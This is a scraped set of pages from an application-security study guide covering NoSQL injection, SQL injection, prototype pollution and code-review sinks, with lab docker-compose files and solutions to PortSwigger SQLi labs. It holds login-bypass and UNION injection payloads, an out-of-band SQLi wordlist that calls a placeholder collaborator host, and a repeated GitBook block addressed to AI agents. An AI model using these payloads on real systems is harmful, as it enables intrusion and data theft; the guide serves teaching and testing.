https://appsecexplained.gitbook.io/appsecexplained/common-vulns/sql-injection-overview.md?ask=&goal= \`\`\` \`ask\` is the immediate question: it should be specific, self-contained, and written in natural language. \`goal\` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections. --- # Unknown \> For the complete documentation index, see \[llms.txt\](https://appsecexplained.gitbook.io/appsecexplained/llms.txt). Markdown versions of documentation pages are available by appending \`.md\` to page URLs; this page is available as \[Markdown\](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/nosql-injection.md). # NoSQL injection ## What is it? NoSQL injection is where an attacker can manipulate the queries made to a NoSQL database through user input. \*\*A simple example:\*\* \* A vulnerable web application has the endpoint /search?user={username} \* When a request is made, the application queries a NoSQL database (e.g., MongoDB) like this: \`db.users.find({username: {$eq: username}})\` \* If an attacker inserts a payload into {username} such as {"$ne": ""}, it may modify the query to retrieve all users. \* The vulnerable application sends this query to the database, potentially leaking all usernames. It's important to note that payloads may vary depending on the database, query, and application. NoSQL injection can lead to: \* Sensitive data exposure \* Data manipulation \* Denial of service \*\*Other learning resources:\*\* \*\*Writeups:\*\* \*Have a good writeup & want to share it here? Drop me a message on LinkedIn.\* ## Checklist: \* \[ \] What is the technology stack you're attacking? \* \[ \] What NoSQL DB is being used (MongoDB, CouchDB, etc.)? \* \[ \] Verify injection points: \* \[ \] URL parameters \* \[ \] Form fields \* \[ \] HTTP headers (e.g., cookies, etc.) \* \[ \] Out-of-band (data retrieved from a third party) \* \[ \] Test with different operators: $eq, $ne, $gt, $gte, $lt, $lte, etc. \* \[ \] Can you trigger different responses? \* \[ \] Test for login bypass: {"$ne": ""} \* \[ \] Test for blind NoSQLi \* \[ \] Test for errors \* \[ \] Test for conditional responses \* \[ \] Test for conditional errors \* \[ \] Test for time delays \* \[ \] Test for out-of-band interactions \* \[ \] Is there a blocklist? \* \[ \] Can you bypass the blocklist? ## Exploitation \`\`\` # basic login bypass {"username": "anyname", "password": {"$ne": ""}} \`\`\` \`\`\` # retrieve data {"$where": "this.someField == 'someValue'"} \`\`\` \`\`\` # blind {"someField": {"$regex": "^someValue"}} \`\`\` ## References & Resources {% embed url="" %} OWASP WSTG - Testing for NoSQL {% endembed %} {% embed url="" %} PortSwigger NoSQL Injection {% endembed %} --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the \`ask\` query parameter, and the optional \`goal\` query parameter: \`\`\` GET https://appsecexplained.gitbook.io/appsecexplained/common-vulns/nosql-injection.md?ask=&goal= \`\`\` \`ask\` is the immediate question: it should be specific, self-contained, and written in natural language. \`goal\` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections. --- # Unknown \> For the complete documentation index, see \[llms.txt\](https://appsecexplained.gitbook.io/appsecexplained/llms.txt). Markdown versions of documentation pages are available by appending \`.md\` to page URLs; this page is available as \[Markdown\](https://appsecexplained.gitbook.io/appsecexplained/scripts/wordlists/sqli.md). # SQLi ## General SQLi fuzzing ## Out-of-band fuzzing \`\`\` SELECT EXTRACTVALUE(xmltype(' %remote;\]>'),'/l') FROM dual-- SELECT UTL\_INADDR.get\_host\_address('BURP-COLLABORATOR-SUBDOMAIN')-- exec master..xp\_dirtree '//BURP-COLLABORATOR-SUBDOMAIN/a'-- copy (SELECT '') to program 'nslookup BURP-COLLABORATOR-SUBDOMAIN' LOAD\_FILE('\\\\\\\\BURP-COLLABORATOR-SUBDOMAIN\\\\a') SELECT ... INTO OUTFILE '\\\\\\\\BURP-COLLABORATOR-SUBDOMAIN\\a'-- - \`\`\` --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the \`ask\` query parameter, and the optional \`goal\` query parameter: \`\`\` GET https://appsecexplained.gitbook.io/appsecexplained/scripts/wordlists/sqli.md?ask=&goal= \`\`\` \`ask\` is the immediate question: it should be specific, self-contained, and written in natural language. \`goal\` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections. --- # Unknown \> For the complete documentation index, see \[llms.txt\](https://appsecexplained.gitbook.io/appsecexplained/llms.txt). Markdown versions of documentation pages are available by appending \`.md\` to page URLs; this page is available as \[Markdown\](https://appsecexplained.gitbook.io/appsecexplained/code-review/sinks.md). # Sinks | Vulnerability Type | Java Sinks | PHP Sinks | Node.js Sinks | | ---------------------------------------------- | ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | | \*\*Remote Code Execution (RCE)\*\* | `Runtime.getRuntime().exec()` `ProcessBuilder.start()` `Method.invoke()` `ScriptEngine.eval()` `InitialContext.lookup()` (JNDI Injection) | `shell\_exec()` `exec()` `system()` `passthru()` `proc\_open()` `popen()` `eval()` `assert()` `create\_function()` | `child\_process.exec()` `child\_process.execSync()` `child\_process.spawn()` `vm.runInContext()` `vm.runInNewContext()` | | \*\*SQL Injection (SQLi)\*\* | `Statement.executeQuery()` `Statement.executeUpdate()` `Statement.execute()` `EntityManager.createQuery()` | `mysqli\_query()` `mysql\_query()` `pg\_query()` `PDO::query()` (without prepared statements) | `db.collection.find({ user: req.query.user })` (NoSQLi in MongoDB) `sequelize.query()` (raw queries) | | \*\*Path Traversal / Arbitrary File Read/Write\*\* | `File(String)` `FileReader(String)` `FileWriter(String)` `Files.readAllBytes(Path)` `ZipInputStream.getNextEntry()` | `file\_get\_contents()` `fopen()` `readfile()` `include()` `require()` `unlink()` | `fs.readFileSync()` `fs.readFile()` `fs.createReadStream()` `fs.writeFileSync()` `fs.unlinkSync()` | | \*\*Server-Side Request Forgery (SSRF)\*\* | `HttpURLConnection.openConnection()` `URL.openStream()` `RestTemplate.getForObject()` `WebClient.get().uri()` | `file\_get\_contents("http\://...")` `curl\_exec()` `stream\_context\_create()` | `http.get()` `axios.get()` `fetch()` `request()` | | \*\*Cross-Site Scripting (XSS)\*\* | `response.getWriter().write()` `HttpServletResponse.getOutputStream().print()` JSP: `<%= userInput %>` | `echo $\_GET\["input"];` `print($\_POST\["input"]);` `printf($\_GET\["input"]);` `exit($\_GET\["input"]);` | `res.send(req.query.input)` `res.write(req.body.input)` `document.write(req.query.input)` (in client-side JS) | | \*\*Cross-Site Request Forgery (CSRF)\*\* | `doPost(HttpServletRequest req, HttpServletResponse res)` `doPut(HttpServletRequest req, HttpServletResponse res)` `doDelete(HttpServletRequest req, HttpServletResponse res)` | Forms with `method="POST"` and no CSRF token Session-modifying endpoints (`$\_SESSION`, `setcookie()`) | \`app.post('/update', (req, res) => {...}\` (without CSRF token verification) | | \*\*XML External Entity (XXE) Injection\*\* | `DocumentBuilder.parse()` `SAXParser.parse()` `XMLReader.parse()` `TransformerFactory.newInstance().newTransformer().transform()` | `simplexml\_load\_string()` `DOMDocument.loadXML()` `xml\_parser\_create()` | `xml2js.parseString()` `libxmljs.parseXml()` | | \*\*LDAP Injection\*\* | `DirContext.search()` `LdapContext.search()` | `ldap\_search()` `ldap\_list()` `ldap\_read()` | \`ldapClient.search()\` (Node.js LDAP client) | | \*\*Insecure Logging (Information Disclosure)\*\* | `Logger.info()` `Logger.debug()` `System.out.println()` `PrintWriter.println()` | `error\_log($\_GET\["input"]);` `var\_dump($\_POST\["password"]);` `print\_r($\_SERVER);` | `console.log(req.body.password)` `winston.log('info', req.query.debug)` | | \*\*Insecure Cryptography\*\* | `MessageDigest.getInstance("MD5")` `Cipher.getInstance("DES")` `Cipher.getInstance("ECB")` | `md5()` `sha1()` `crypt("plaintext", "salt")` `base64\_encode()` | `crypto.createHash('md5')` `crypto.createCipher('des', key)` | | \*\*Insecure Session Management\*\* | `HttpSession.getAttribute()` `request.getSession(true)` | `session\_start();` `setcookie("PHPSESSID", ...)` | \`req.session.user = "admin"\` (without secure flags) | --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the \`ask\` query parameter, and the optional \`goal\` query parameter: \`\`\` GET https://appsecexplained.gitbook.io/appsecexplained/code-review/sinks.md?ask=&goal= \`\`\` \`ask\` is the immediate question: it should be specific, self-contained, and written in natural language. \`goal\` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections. --- # Unknown \> For the complete documentation index, see \[llms.txt\](https://appsecexplained.gitbook.io/appsecexplained/llms.txt). Markdown versions of documentation pages are available by appending \`.md\` to page URLs; this page is available as \[Markdown\](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/race-conditions.md). # Race conditions ### Introduction > A race condition vulnerability requires a 'collision' - two concurrent operations on a shared resource. James Kettle Intro ### Sections \* Method & tools \* Limit overrun \* Single-endpoint race conditions \* Multi-endpoint race conditions \* Defences & prevention \* Labs & writeups ### Video ![](https://appsecexplained.gitbook.io/files/bOHUh2zdsjItsf09lRys) Video in progress ;) \### Cheatsheet \* \[ \] asd \* \[ \] asd \* \[ \] asd --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the \`ask\` query parameter, and the optional \`goal\` query parameter: \`\`\` GET https://appsecexplained.gitbook.io/appsecexplained/common-vulns/race-conditions.md?ask=&goal= \`\`\` \`ask\` is the immediate question: it should be specific, self-contained, and written in natural language. \`goal\` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections. --- # Unknown \> For the complete documentation index, see \[llms.txt\](https://appsecexplained.gitbook.io/appsecexplained/llms.txt). Markdown versions of documentation pages are available by appending \`.md\` to page URLs; this page is available as \[Markdown\](https://appsecexplained.gitbook.io/appsecexplained/scripts/docker-compose.yml-files/wordpress.md). # Wordpress \`\`\`docker version: '3.3' services: wordpress: depends\_on: - db image: wordpress:latest volumes: - wordpress\_files:/var/www/html ports: - "80:80" restart: always environment: WORDPRESS\_DB\_HOST: db:3306 WORDPRESS\_DB\_USER: wordpress WORDPRESS\_DB\_PASSWORD: wordpresspassword WORDPRESS\_DB\_NAME: wordpress db: image: mysql:latest volumes: - db\_data:/var/lib/mysql ports: - "3306:3306" restart: always environment: MYSQL\_ROOT\_PASSWORD: myrootpassword MYSQL\_DATABASE: wordpress MYSQL\_USER: wordpress MYSQL\_PASSWORD: wordpresspassword volumes: wordpress\_files: db\_data: \`\`\` --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the \`ask\` query parameter, and the optional \`goal\` query parameter: \`\`\` GET https://appsecexplained.gitbook.io/appsecexplained/scripts/docker-compose.yml-files/wordpress.md?ask=&goal= \`\`\` \`ask\` is the immediate question: it should be specific, self-contained, and written in natural language. \`goal\` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections. --- # Unknown \> For the complete documentation index, see \[llms.txt\](https://appsecexplained.gitbook.io/appsecexplained/llms.txt). Markdown versions of documentation pages are available by appending \`.md\` to page URLs; this page is available as \[Markdown\](https://appsecexplained.gitbook.io/appsecexplained/scripts/wordlists/single-characters.md). # Single characters ## a-z \`\`\` a b c d e f g h i j k l m n o p q r s t u v w x y z \`\`\` ## A-Z \`\`\` A B C D E F G H I J K L M N O P Q R S T U V W X Y Z \`\`\` ## Special characters \`\`\` ! @ # $ % ^ & \* ( ) - \_ = + \[ \] { } \\ | ; ' " : , . < > / ? \` ~ \`\`\` --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the \`ask\` query parameter, and the optional \`goal\` query parameter: \`\`\` GET https://appsecexplained.gitbook.io/appsecexplained/scripts/wordlists/single-characters.md?ask=&goal= \`\`\` \`ask\` is the immediate question: it should be specific, self-contained, and written in natural language. \`goal\` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections. --- # Unknown \> For the complete documentation index, see \[llms.txt\](https://appsecexplained.gitbook.io/appsecexplained/llms.txt). Markdown versions of documentation pages are available by appending \`.md\` to page URLs; this page is available as \[Markdown\](https://appsecexplained.gitbook.io/appsecexplained/scripts/docker-compose.yml-files/sqli-testing-labs.md). # SQLi testing labs You can use this script to spin up four databases, MySQL, Oracle, SQL Server and PostgreSQL. It's useful for: \* Learning SQL \* Testing SQL statements \* Testing SQL injection payloads \`\`\` version: '3' services: mysql: image: mysql:8.0 environment: MYSQL\_ROOT\_PASSWORD: root\_password MYSQL\_DATABASE: test\_db ports: - "3306:3306" sqlserver: image: mcr.microsoft.com/mssql/server:2019-latest environment: SA\_PASSWORD: "Strong!Passw0rd" ACCEPT\_EULA: "Y" ports: - "1433:1433" postgres: image: postgres:13 environment: POSTGRES\_PASSWORD: root\_password POSTGRES\_DB: test\_db ports: - "5432:5432" oracle: image: oracleinanutshell/oracle-xe-11g environment: ORACLE\_ALLOW\_REMOTE: "true" ORACLE\_DISABLE\_ASYNCH\_IO: "true" ORACLE\_ENABLE\_XDB: "false" ports: - "1521:1521" \`\`\` ## Quick start ### Postgresql Connect to PostgreSQL. \`\`\` psql -h localhost -p 5432 -U postgres -W \`\`\` Common commands. \`\`\` # List databases \\l \\list # Connect to a database \\c \# List tables \\dt # Basic query SELECT \* FROM ; \`\`\` ### MySQL Connect to MySQL. \`\`\` mysql -h localhost -P 3306 -u root -p \`\`\` Common commands. \`\`\` # List databases SHOW DATABASES; # Connect to a database USE ; # List tables SHOW TABLES; # Basic query SELECT \* FROM ; \`\`\` ### Oracle Connect to Oracle. {% hint style="info" %} You can install the oracle client and configure it locally on your Kali machine, but it's easier to just connect to the container and work locally there. {% endhint %} \`\`\` # Connect to your container sudo docker ps -a sudo docker exec -it bash sqlplus system/oracle@localhost:1521/xe \`\`\` Common commands. \`\`\` # List tables SELECT table\_name FROM user\_tables; # Basic query SELECT \* FROM table\_name; \`\`\` --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the \`ask\` query parameter, and the optional \`goal\` query parameter: \`\`\` GET https://appsecexplained.gitbook.io/appsecexplained/scripts/docker-compose.yml-files/sqli-testing-labs.md?ask=&goal= \`\`\` \`ask\` is the immediate question: it should be specific, self-contained, and written in natural language. \`goal\` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections. --- # Unknown \> For the complete documentation index, see \[llms.txt\](https://appsecexplained.gitbook.io/appsecexplained/llms.txt). Markdown versions of documentation pages are available by appending \`.md\` to page URLs; this page is available as \[Markdown\](https://appsecexplained.gitbook.io/appsecexplained/code-review/getting-started.md). # Getting started {% hint style="info" %} Coming soon - I'll be putting together a short course on code review :) {% endhint %} ## Why code review? Before we dive into why, it's worth mentioning that this section is related to code review with the intent of finding security vulnerabilities and weaknesses within web applications. Not the typical peer review carried out be development teams. If you're interested in code review in general, this is a good place to start . From now on, we'll be looking at code review to support pentesting and security research activities. There are many benefits to code review, and it's a skill that takes time to build. The main benefits are: \* Easily spot certain vulnerabilities or weaknesses \* Hardcoded credentials \* Weak encryption \* Insecure libraries or dependencies \* Find hidden or complex vulnerabilities \* Find malicious code (e.g. backdoors) \* Achieve compliance --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the \`ask\` query parameter, and the optional \`goal\` query parameter: \`\`\` GET https://appsecexplained.gitbook.io/appsecexplained/code-review/getting-started.md?ask=&goal= \`\`\` \`ask\` is the immediate question: it should be specific, self-contained, and written in natural language. \`goal\` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections. --- # Unknown \> For the complete documentation index, see \[llms.txt\](https://appsecexplained.gitbook.io/appsecexplained/llms.txt). Markdown versions of documentation pages are available by appending \`.md\` to page URLs; this page is available as \[Markdown\](https://appsecexplained.gitbook.io/appsecexplained/scripts/docker-compose.yml-files.md). # Docker-compose.yml files Here you can find docker-compose.yml files I use to spin up environments for testing on Kali and Debian. --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the \`ask\` query parameter, and the optional \`goal\` query parameter: \`\`\` GET https://appsecexplained.gitbook.io/appsecexplained/scripts/docker-compose.yml-files.md?ask=&goal= \`\`\` \`ask\` is the immediate question: it should be specific, self-contained, and written in natural language. \`goal\` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections. --- # Unknown \> For the complete documentation index, see \[llms.txt\](https://appsecexplained.gitbook.io/appsecexplained/llms.txt). Markdown versions of documentation pages are available by appending \`.md\` to page URLs; this page is available as \[Markdown\](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/prototype-pollution/client-side-prototype-pollution.md). # Client-side prototype pollution ## What is it? Client-side Prototype Pollution is an attack that occurs when an attacker is able to manipulate the prototype of a JavaScript object. This can lead to unexpected behavior in the application, and sometimes lead to bypassing of security measures and Remote Code Execution. \*\*A simple example\*\* Consider this vulnerable JavaScript function: \`\`\`javascript function extend(target, source) { for (let key in source) { target\[key\] = source\[key\]; } } \`\`\` If an we can control the \`source\` object and sets \`source.\_\_proto\_\_.isAdmin = true\`, then this will set \`isAdmin = true\` on all objects that inherit from \`Object\`, potentially leading to an escalation of privileges. Note that payload or attack depends on the application and the structure of the code. Client-side Prototype Pollution can often lead to: \* Privilege escalation \* Security measures bypass \* Data manipulation \* Remote code execution \*\*Other learning resources:\*\* \* \*\*Writeups:\*\* \* ## Checklist \* \[ \] Understand the JavaScript environment \* \[ \] What libraries or frameworks are being used \* \[ \] How does the application handle user input \* \[ \] How does the application manipulate objects and their prototypes \* \[ \] Identify potential points of attack \* \[ \] User-supplied input that is directly used as an object \* \[ \] Functions that iterate over properties of user-supplied objects \* \[ \] Functions that use the Object or Function constructors with user input \* \[ \] Test the prototype \* \[ \] Can you add a new property to the prototype? \* \[ \] Can you modify an existing property on the prototype? \* \[ \] Can you delete a property from the prototype? \* \[ \] Test for privilege escalation \* \[ \] Add a new user privilege to the prototype \* \[ \] Modify an existing user privilege on the prototype \* \[ \] Delete a user privilege from the prototype \* \[ \] Test for security measures bypass \* \[ \] Add a new security property to the prototype \* \[ \] Modify an existing security property on the prototype \* \[ \] Delete a security property from the prototype \* \[ \] Is it actually exploitable? \* \[ \] Is there a blocklist? \* \[ \] Can you bypass the blocklist? \* \[ \] Test for insecure direct object references \* \[ \] Test for remote code execution \* \[ \] Test for patches \* \[ \] How does the application behave with patched libraries like Lodash, JQuery, etc.? \* \[ \] Is the patch effective or can it be bypassed? ## Exploitation \`\`\`javascript // Add new property payload = '{"\_\_proto\_\_":{"polluted":"pwned"}}' // Modify an existing property payload = '{"\_\_proto\_\_":{"existingProperty":"new value"}}' // Delete a property payload = '{"\_\_proto\_\_":{"existingProperty":null}}' // Adding user privilege payload = '{"\_\_proto\_\_":{"isAdmin":true}}' // Bypassing security measures payload = '{"\_\_proto\_\_":{"validateInput":false}}' \`\`\` --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the \`ask\` query parameter, and the optional \`goal\` query parameter: \`\`\` GET https://appsecexplained.gitbook.io/appsecexplained/common-vulns/prototype-pollution/client-side-prototype-pollution.md?ask=&goal= \`\`\` \`ask\` is the immediate question: it should be specific, self-contained, and written in natural language. \`goal\` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections. --- # Unknown \> For the complete documentation index, see \[llms.txt\](https://appsecexplained.gitbook.io/appsecexplained/llms.txt). Markdown versions of documentation pages are available by appending \`.md\` to page URLs; this page is available as \[Markdown\](https://appsecexplained.gitbook.io/appsecexplained/scripts/php-scripts.md). # PHP scripts - \[RCE Function Check\](https://appsecexplained.gitbook.io/appsecexplained/scripts/php-scripts/rce-function-check.md) --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the \`ask\` query parameter, and the optional \`goal\` query parameter: \`\`\` GET https://appsecexplained.gitbook.io/appsecexplained/scripts/php-scripts.md?ask=&goal= \`\`\` \`ask\` is the immediate question: it should be specific, self-contained, and written in natural language. \`goal\` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections. --- # Unknown \> For the complete documentation index, see \[llms.txt\](https://appsecexplained.gitbook.io/appsecexplained/llms.txt). Markdown versions of documentation pages are available by appending \`.md\` to page URLs; this page is available as \[Markdown\](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/apis/api-bola.md). # API: BOLA --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the \`ask\` query parameter, and the optional \`goal\` query parameter: \`\`\` GET https://appsecexplained.gitbook.io/appsecexplained/common-vulns/apis/api-bola.md?ask=&goal= \`\`\` \`ask\` is the immediate question: it should be specific, self-contained, and written in natural language. \`goal\` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections. --- # Unknown \> For the complete documentation index, see \[llms.txt\](https://appsecexplained.gitbook.io/appsecexplained/llms.txt). Markdown versions of documentation pages are available by appending \`.md\` to page URLs; this page is available as \[Markdown\](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/apis/bopla.md). # BOPLA --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the \`ask\` query parameter, and the optional \`goal\` query parameter: \`\`\` GET https://appsecexplained.gitbook.io/appsecexplained/common-vulns/apis/bopla.md?ask=&goal= \`\`\` \`ask\` is the immediate question: it should be specific, self-contained, and written in natural language. \`goal\` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections. --- # Unknown \> For the complete documentation index, see \[llms.txt\](https://appsecexplained.gitbook.io/appsecexplained/llms.txt). Markdown versions of documentation pages are available by appending \`.md\` to page URLs; this page is available as \[Markdown\](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/sql-injection-overview/sqli-lab-setup-and-writeups.md). # SQLi lab setup & writeups ## Lab setup The page linked below shows a simple setup to start learning SQL and testing SQL injection payloads locally. One of the biggest things you can do to catapult your learning and experience is to set things up locally and test them. You'll gain a deeper understanding of systems, how they work, how they are exploited, and invaluable troubleshooting skills. It WILL set you apart from those that just rely on pre-made or hosted CTFs. {% content-ref url="/pages/c8OYbYlgr4yAOOLaxwKi" %} \[SQLi testing labs\](/appsecexplained/scripts/docker-compose.yml-files/sqli-testing-labs.md) {% endcontent-ref %} ## Labs list #### SQL injection vulnerability in WHERE clause allowing retrieval of hidden data PortSwigger | free | easy | \[link to lab\](https://portswigger.net/web-security/sql-injection/lab-retrieve-hidden-data) Solution \`\`\` 1. Click on a search item such as gifts 2. Modify the query to include your payload /filter?category=Gifts' or 1='1 3. Send the request \`\`\` \#### SQL injection vulnerability allowing login bypass PortSwigger | free | easy | \[link to lab\](https://portswigger.net/web-security/sql-injection/lab-login-bypass) Solution \`\`\` 1. Browse to the login page 2. Enter your payload into the username box administrator' or 1=1-- - 3. Enter any password 4. Click Log in \`\`\` \#### SQL injection attack, querying the database type and version on Oracle PortSwigger | free | easy | \[link to lab\](https://portswigger.net/web-security/sql-injection/examining-the-database/lab-querying-database-version-oracle) Solution \`\`\` 1. Select one of the filters to refine the search 2. Test for UNION attack ' UNION SELECT null FROM dual-- ' UNION SELECT null,null FROM dual-- 3. Select the database version ' UNION SELECT banner,null FROM v$version-- \`\`\` \#### SQL injection attack, querying the database type and version on MySQL and Microsoft PortSwigger | free | easy | \[link to lab\](https://portswigger.net/web-security/sql-injection/examining-the-database/lab-querying-database-version-mysql-microsoft) Solution \`\`\` 1. Select one of the filters to refine the search 2. Test for UNION attack ' UNION SELECT null-- - ' UNION SELECT null,null-- - 3. Select the database version ' UNION SELECT version(),null-- - \`\`\` \#### SQL injection attack, listing the database contents on non-Oracle databases PortSwigger | free | easy | \[link to lab\](https://portswigger.net/web-security/sql-injection/examining-the-database/lab-listing-database-contents-non-oracle) Solution \`\`\` 1. Select one of the filters to refine the search 2. Test for UNION attack ' UNION SELECT null-- - ' UNION SELECT null,null-- - 3. List the tables in the DB ' UNION SELECT table\_name,null FROM information\_schema.tables-- Table name is users\_\[unique-value\] 4. List the column names in the table ' UNION SELECT column\_name,null FROM information\_schema.columns WHERE table\_name = 'users\_\[unique-value\]'-- 5. Get the password for the user 'administrator' and then login ' UNION SELECT password\_\[unique-value\],null FROM users\_\[unique-value\] WHERE username\_\[unique-value\]='administrator'-- \`\`\` \#### SQL injection attack, listing the database contents on Oracle PortSwigger | free | easy | \[link to lab\](https://portswigger.net/web-security/sql-injection/examining-the-database/lab-listing-database-contents-oracle) Solution \`\`\` 1. Select one of the filters to refine the search 2. Test for UNION attack ' UNION SELECT null FROM dual-- ' UNION SELECT null,null FROM dual-- 3. List the tables in the DB ' UNION SELECT null,table\_name FROM all\_tables-- USERS\_\[unique-value\] 4. Get the column names ' UNION SELECT null,column\_name FROM all\_tab\_columns WHERE table\_name=USERS\_\[unique-value\]-- 5. Get the user information and then login ' UNION SELECT 